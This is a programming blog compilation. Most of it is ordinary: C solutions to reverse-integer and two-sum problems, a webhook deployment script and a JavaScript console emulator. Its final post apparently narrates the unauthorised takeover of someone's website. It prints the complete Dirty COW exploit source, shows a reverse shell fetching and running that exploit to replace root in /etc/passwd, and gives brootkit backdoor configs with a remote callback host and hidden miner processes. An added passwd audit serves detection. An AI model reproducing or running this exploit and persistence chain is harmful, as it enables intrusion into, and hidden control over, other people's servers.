Articles in the category Programming and Tools

Algorithm 2: Reverse Integer (C)


Given a 32-bit signed integer, reverse the digits of the integer.

Example 1:

Input: 123
Output: 321

Example 2:

Input: -123
Output: -321

Example 3:

Input: 120
Output: 21

Note:

Assume the environment can only store 32-bit signed integers, so the value range is [−2^31, 2^31 − 1]. Under this assumption, return 0 if the reversed integer overflows.

Code snippet:

#include <limits.h>

int reverse(int x){
    /* long long is 64 bits everywhere, so it can hold the reversed value even
     * when that value is outside the int range; plain long is only 32 bits on
     * some platforms, and -2147483648 as a literal does not fit in an int. */
    long long res = 0;
    while (x != 0) {
        res = res * 10 + x % 10;   /* x % 10 takes the sign of x, so negatives work */
        x /= 10;
    }
    /* the problem asks for 0 when the result does not fit in 32 bits */
    return (res > INT_MAX || res < INT_MIN) ? 0 : (int)res;
}
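The overflow check can also be done without a wider type. The following is an added example, not code from the original post (`reverse_checked` is my name for it): it tests whether `res * 10 + digit` would leave the int range before doing the arithmetic, so no intermediate expression ever overflows, which in C is undefined behaviour rather than a value you can compare afterwards.

```c
#include <limits.h>
#include <stdio.h>

/* Reverse the decimal digits of a 32-bit int, returning 0 on overflow.
 * The range test runs before each multiply-add, using only int values:
 * INT_MAX / 10 == 214748364, INT_MAX % 10 == 7,
 * INT_MIN / 10 == -214748364, INT_MIN % 10 == -8. */
int reverse_checked(int x) {
    int res = 0;
    while (x != 0) {
        int digit = x % 10;   /* takes the sign of x: -123 % 10 == -3 */
        x /= 10;
        if (res > INT_MAX / 10 || (res == INT_MAX / 10 && digit > INT_MAX % 10))
            return 0;         /* would exceed INT_MAX */
        if (res < INT_MIN / 10 || (res == INT_MIN / 10 && digit < INT_MIN % 10))
            return 0;         /* would go below INT_MIN */
        res = res * 10 + digit;
    }
    return res;
}

int main(void) {
    int samples[] = { 123, -123, 120, 1534236469, 1463847412, INT_MIN };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%d -> %d\n", samples[i], reverse_checked(samples[i]));
    return 0;
}
```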

Algorithm 1: Two Sum (C)


Given an integer array nums and a target value target, find the two integers in the array whose sum equals the target and return their array indices.

You may assume that each input has exactly one answer, but you may not use the same element of the array twice.

Example:

Given nums = [2, 7, 11, 15], target = 9

Because nums[0] + nums[1] = 2 + 7 = 9,
return [0, 1]

The straightforward approach

#include <stdlib.h>

/**
 * Note: The returned array must be malloced, assume caller calls free().
 */
int* twoSum(int* nums, int numsSize, int target, int* returnSize){
    int *result = (int*)malloc(sizeof(int) * 2);
    if (result == NULL) {
        *returnSize = 0;
        return NULL;
    }
    result[0] = 0;
    result[1] = 0;   /* the original wrote result[0] twice and left slot 1 uninitialised */
    for (int i = 0; i < numsSize; i++) {
        for (int n = i + 1; n < numsSize; n++) {   /* n > i, so an element is never reused */
            if (nums[i] + nums[n] == target) {
                result[0] = i;
                result[1] = n;
                *returnSize = 2;
                return result;
            }
        }
    }
    /* no pair found: release the buffer and report a size of 0 instead of leaking it */
    free(result);
    *returnSize = 0;
    return NULL;
}
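The nested loops above are O(n²). As an added example, not code from the original post, here is the same problem in one pass: `twoSumHash` (my name) records each value's first index in an open-addressing hash table and looks up `target - nums[i]` before inserting `nums[i]`, so an element is never paired with itself; the complement is computed in long long because `target - nums[i]` can itself overflow int.

```c
#include <limits.h>
#include <stdlib.h>

/* One-pass Two Sum: the table maps value -> first index. For each element the
 * complement is looked up before the element is inserted, so the same element
 * is never used twice. Returns a malloc'd int[2] (caller frees) or NULL with
 * *returnSize = 0 when no pair exists. */
int* twoSumHash(int* nums, int numsSize, int target, int* returnSize) {
    size_t cap = 16;
    while (cap < (size_t)numsSize * 2) cap <<= 1;     /* power of two, load <= 0.5 */
    int *keys = malloc(cap * sizeof *keys);
    int *vals = malloc(cap * sizeof *vals);
    unsigned char *used = calloc(cap, 1);
    int *result = NULL;
    *returnSize = 0;
    if (!keys || !vals || !used) goto done;
    for (int i = 0; i < numsSize; i++) {
        /* target - nums[i] can overflow int, so compute it in long long */
        long long want = (long long)target - nums[i];
        if (want >= INT_MIN && want <= INT_MAX) {
            int need = (int)want;
            size_t h = ((size_t)(unsigned)need * 2654435761u) & (cap - 1);
            for (; used[h]; h = (h + 1) & (cap - 1)) {
                if (keys[h] != need) continue;
                result = malloc(2 * sizeof *result);
                if (result) { result[0] = vals[h]; result[1] = i; *returnSize = 2; }
                goto done;
            }
        }
        /* insert nums[i] -> i, keeping the earliest index for repeated values */
        size_t h = ((size_t)(unsigned)nums[i] * 2654435761u) & (cap - 1);
        while (used[h] && keys[h] != nums[i]) h = (h + 1) & (cap - 1);
        if (!used[h]) { used[h] = 1; keys[h] = nums[i]; vals[h] = i; }
    }
done:
    free(keys); free(vals); free(used);
    return result;
}

/* Helper for quick checks: encodes the pair as i0 * 1000 + i1, or -1 if none. */
int pair_code(int *nums, int n, int target) {
    int rs, *r = twoSumHash(nums, n, target, &rs);
    int code = (r && rs == 2) ? r[0] * 1000 + r[1] : -1;
    free(r);
    return code;
}
```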

Baota webhook script for automatic deployment of multiple git projects


What I wrote before could mostly only deploy one project; this time I changed it to deploy multiple projects automatically.

#!/bin/bash
echo ""
# print the current time
date "+%Y-%m-%d %H:%M:%S"
echo "Start"
# check that the Baota WebHook parameter was supplied
if [ -z "$1" ]; then
        echo "param参数错误"
        echo "End"
        exit 1
fi
# parse the parameter, e.g. abc/efg
param="$1"
obj_user=${param%\/*}
obj_name=${param#*\/}
# the parameter comes from the webhook request and is used to build a
# filesystem path and a git URL, so accept only plain names: non-empty,
# no slash, no "..", starting with a letter or digit, and otherwise
# limited to letters, digits, ".", "_" and "-"
for part in "$obj_user" "$obj_name"; do
        case "$part" in
                ""|*/*|*..*|[!A-Za-z0-9]*|*[!A-Za-z0-9._-]*)
                        echo "param参数错误"
                        echo "End"
                        exit 1
                        ;;
        esac
done
# git project path
gitPath="/www/wwwroot/we7.71yunduan.top/addons/$obj_name/"
if [ ! -d "$gitPath" ]; then
        mkdir -p "$gitPath"
fi
# git URL
gitHttp="git@gitlib.71yunduan.top:$obj_user/$obj_name.git"

echo "Web站点路径:$gitPath"
echo "Git项目地址:$gitHttp"

# check that the project path exists
if [ -d "$gitPath" ]; then
        cd "$gitPath" || exit 1
        # check whether a .git directory exists
        if [ ! -d ".git" ]; then
                echo "在该目录下克隆 git"
                git clone "$gitHttp" gittemp
                mv gittemp/.git .
                rm -rf gittemp
        fi
        # pull the latest project files
        git reset --hard origin/master
        git pull
        # set directory ownership
        chown -R www:www "$gitPath"
        echo "End"
        exit 0
else
        echo "该项目路径不存在"
        echo "End"
        exit 1
fi

A browser console output inside a page


Today a classmate suddenly asked me about Liao's site, where you type JS code into an input box and get output just like in the console. Here is a piece of code for it.

<textarea id="code">console.log('123')</textarea>
<button onclick="exe()">t</button>
<div id="text" style="white-space: pre"></div>
<script>

function exe(){
    var t=document.getElementById('code').value
    execute_javascript(t)
}
function execute_javascript(code) {
    (function () {
        // prepare console.log: every level appends to the same buffer
        var
            buffer = '',
            _log = function (s) {
                buffer = buffer + s + '\n';
            },
            _warn = function (s) {
                buffer = buffer + s + '\n';
            },
            _error = function (s) {
                buffer = buffer + s + '\n';
            },
            _console = {
                trace: _log,
                debug: _log,
                log: _log,
                info: _log,
                warn: _warn,
                error: _error
            };
        try {
            // the wrapper function shadows the global console with _console
            eval('(function() {\n var console = _console; \n' + code + '\n})();');
            if (!buffer) {
                buffer = '(no output)';
            }
        }
        catch (e) {
            // show the error as well; the original only rendered on success
            buffer = buffer + String(e);
        }
        // textContent, not innerHTML: the captured output is data, not markup
        document.getElementById("text").textContent = buffer;
    })();
}
</script>

Site takeover follow-up: getting a webshell and escalating privileges


1. Finding a method

This was the hardest part; while searching for a way to escalate I nearly gave up.

I searched Baidu for all kinds of methods: some were SUID, some were privilege-escalation helper tools (those were the biggest trap: after finding them they didn't work, although they spat out all kinds of information). And a lot of them were about Windows privilege escalation.

When I was about to give up I went and browsed exploit-db anyway to see whether some 0day-type vulnerability existed; heaven rewards the persistent, and I finally dug one up.......

Honestly this thing has an odd name, "Dirty COW", and it really is dirty as hell. I thought it would escalate the current user, but the dirtiest part is that it wipes out root....

Although it is a 2016 vulnerability, here... hehe... you all understand. ---------Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd)

Its code is:

//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
//   The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
//   https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
//   gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
//   "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
//   mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//
 
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>
 
const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";
 
int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;
 
struct Userinfo {
   char *username;
   char *hash;
   int user_id;
   int group_id;
   char *info;
   char *home_dir;
   char *shell;
};
 
char *generate_password_hash(char *plaintext_pw) {
  return crypt(plaintext_pw, salt);
}
 
char *generate_passwd_line(struct Userinfo u) {
  const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
  int size = snprintf(NULL, 0, format, u.username, u.hash,
    u.user_id, u.group_id, u.info, u.home_dir, u.shell);
  char *ret = malloc(size + 1);
  sprintf(ret, format, u.username, u.hash, u.user_id,
    u.group_id, u.info, u.home_dir, u.shell);
  return ret;
}
 
void *madviseThread(void *arg) {
  int i, c = 0;
  for(i = 0; i < 200000000; i++) {
    c += madvise(map, 100, MADV_DONTNEED);
  }
  printf("madvise %d\n\n", c);
}
 
int copy_file(const char *from, const char *to) {
  // check if target file already exists
  if(access(to, F_OK) != -1) {
    printf("File %s already exists! Please delete it and run again\n",
      to);
    return -1;
  }
 
  char ch;
  FILE *source, *target;
 
  source = fopen(from, "r");
  if(source == NULL) {
    return -1;
  }
  target = fopen(to, "w");
  if(target == NULL) {
     fclose(source);
     return -1;
  }
 
  while((ch = fgetc(source)) != EOF) {
     fputc(ch, target);
   }
 
  printf("%s successfully backed up to %s\n",
    from, to);
 
  fclose(source);
  fclose(target);
 
  return 0;
}
 
int main(int argc, char *argv[])
{
  // backup file
  int ret = copy_file(filename, backup_filename);
  if (ret != 0) {
    exit(ret);
  }
 
  struct Userinfo user;
  // set values, change as needed
  user.username = "firefart";
  user.user_id = 0;
  user.group_id = 0;
  user.info = "pwned";
  user.home_dir = "/root";
  user.shell = "/bin/bash";
 
  char *plaintext_pw;
 
  if (argc >= 2) {
    plaintext_pw = argv[1];
    printf("Please enter the new password: %s\n", plaintext_pw);
  } else {
    plaintext_pw = getpass("Please enter the new password: ");
  }
 
  user.hash = generate_password_hash(plaintext_pw);
  char *complete_passwd_line = generate_passwd_line(user);
  printf("Complete line:\n%s\n", complete_passwd_line);
 
  f = open(filename, O_RDONLY);
  fstat(f, &st);
  map = mmap(NULL,
             st.st_size + sizeof(long),
             PROT_READ,
             MAP_PRIVATE,
             f,
             0);
  printf("mmap: %lx\n",(unsigned long)map);
  pid = fork();
  if(pid) {
    waitpid(pid, NULL, 0);
    int u, i, o, c = 0;
    int l=strlen(complete_passwd_line);
    for(i = 0; i < 10000/l; i++) {
      for(o = 0; o < l; o++) {
        for(u = 0; u < 10000; u++) {
          c += ptrace(PTRACE_POKETEXT,
                      pid,
                      map + o,
                      *((long*)(complete_passwd_line + o)));
        }
      }
    }
    printf("ptrace %d\n",c);
  }
  else {
    pthread_create(&pth,
                   NULL,
                   madviseThread,
                   NULL);
    ptrace(PTRACE_TRACEME);
    kill(getpid(), SIGSTOP);
    pthread_join(pth,NULL);
  }
 
  printf("Done! Check %s to see if the new user was created.\n", filename);
  printf("You can log in with the username '%s' and the password '%s'.\n\n",
    user.username, plaintext_pw);
    printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
    backup_filename, filename);
  return 0;
}

2. So let's escalate

First I compiled it locally,

┌─[invisible@parrot]─[~]
└──╼ $gcc -pthread exp.c -lcrypt -o exploit

Then I scp'd it to my own server, which makes downloading and running it with a single command convenient.

After receiving the reverse shell with www privileges on my server, I fetched the exploit file and put it under /tmp to run.....

sh-4.1$ wget http://175.19.213.138:1024/vip_video/exploit
wget http://175.19.213.138:1024/vip_video/exploit
--2017-07-24 16:39:34--  http://175.19.213.138:1024/vip_video/exploit
Connecting to 175.19.213.138:1024... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14368 (14K)
Saving to: `exploit'

     0K .......... ....                                       100%  455K=0.03s

2017-07-24 16:39:34 (455 KB/s) - `exploit' saved [14368/14368]


sh-4.1$ ls exploit
ls exploit
exploit
sh-4.1$ ls -l exploit
ls -l exploit
-rw-r--r-- 1 www www 14368 Jul 24 16:38 exploit
sh-4.1$ chmod +x exploit 
chmod +x exploit

Next comes running it. Honestly I didn't expect the escalation to succeed, and the result even gave me a scare.

sh-4.1$ ./exploit
./exploit
Please enter the new password: 123456
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi8RL.Us0cfSs:0:0:pwned:/root:/bin/bash

mmap: 7efcd4fd6000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123456'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

As you can see, right after the escalation succeeded the root user was replaced with firefart, and a backup of passwd was placed in /tmp.
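From the defender's side, the run above leaves a very recognisable trace in /etc/passwd: a UID-0 entry whose name is not root, and no root entry at all. The following audit is an added example, not code from the post or the exploit; the sample passwd contents are constructed, and `audit_passwd` and the other names are mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed samples: passwd after the run above (root line replaced) vs. a clean file */
static const char SAMPLE_AFTER_EXPLOIT[] =
    "firefart:fi8RL.Us0cfSs:0:0:pwned:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "www:x:500:500::/home/www:/bin/sh\n";
static const char SAMPLE_CLEAN[] =
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n";

/* Scan passwd-format text (name:pw:uid:gid:gecos:home:shell) line by line.
 * Returns the number of UID-0 entries not named "root"; if root_out is
 * non-NULL it is set to 1 when an entry named "root" exists. */
int audit_passwd(const char *text, int *root_out) {
    int aliases = 0, have_root = 0;
    const char *line = text;
    while (*line) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        const char *f1 = memchr(line, ':', len);                 /* end of name field */
        const char *f2 = f1 ? memchr(f1 + 1, ':', len - (size_t)(f1 + 1 - line)) : NULL;
        if (f2) {
            char *end;
            long uid = strtol(f2 + 1, &end, 10);
            if (end > f2 + 1 && *end == ':') {                   /* numeric uid field */
                if (f1 - line == 4 && strncmp(line, "root", 4) == 0) have_root = 1;
                else if (uid == 0) aliases++;
            }
        }
        if (!nl) break;
        line = nl + 1;
    }
    if (root_out) *root_out = have_root;
    return aliases;
}
int count_uid0_aliases(const char *text) { return audit_passwd(text, NULL); }
int root_present(const char *text) { int r; audit_passwd(text, &r); return r; }

int main(int argc, char **argv) {            /* usage: ./audit [passwd-file] */
    static char buf[1 << 16];
    FILE *fp = fopen(argc > 1 ? argv[1] : "/etc/passwd", "r");
    if (!fp) return 1;
    buf[fread(buf, 1, sizeof buf - 1, fp)] = '\0';
    int r, a = audit_passwd(buf, &r);
    printf("%d non-root uid-0 entries, root entry %s\n", a, r ? "present" : "MISSING");
    return (a > 0 || !r) ? 2 : 0;
}
```

The backup the exploit writes to /tmp/passwd.bak is a second artifact worth checking on the same host.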

Then I scanned the ports; port 22 was still open, so I went straight in.....

3. Once the privileges are there, you have to keep them...

I've used a rootkit before that hijacks kernel functions by loading a module; that's a bit too advanced, and I'm still working on studying it....

So here I'll use brootkit, which is pure script.

The config files are as follows:

[17:12 j0 firefart@iZ25thvdau5Z:t2 ~/brootkit]#cat brsh.conf
cat brsh.conf
HIDE_PORT        22
HIDE_FILE        br
HIDE_PROC        sh,minerd
REMOTE_HOST        invisiblegg.tpddns.cn
REMOTE_PORT        12346
SLEEP_TIME        60
[17:12 j0 firefart@iZ25thvdau5Z:t2 ~/brootkit]#cat br.conf
cat br.conf
#brootkit config file.
#
HIDE_PORT        8080,8899
HIDE_FILE        br.conf,bashbd.sh,brootkit,.bdrc,brdaemon,wzt
HIDE_PROC        bashbd,brootkit,pty.spawn,brdaemon,minerd
REMOTE_HOST        invisiblegg.tpddns.cn
REMOTE_PORT        12346
SLEEP_TIME        60

Then ./install.sh to plant the backdoor and leave.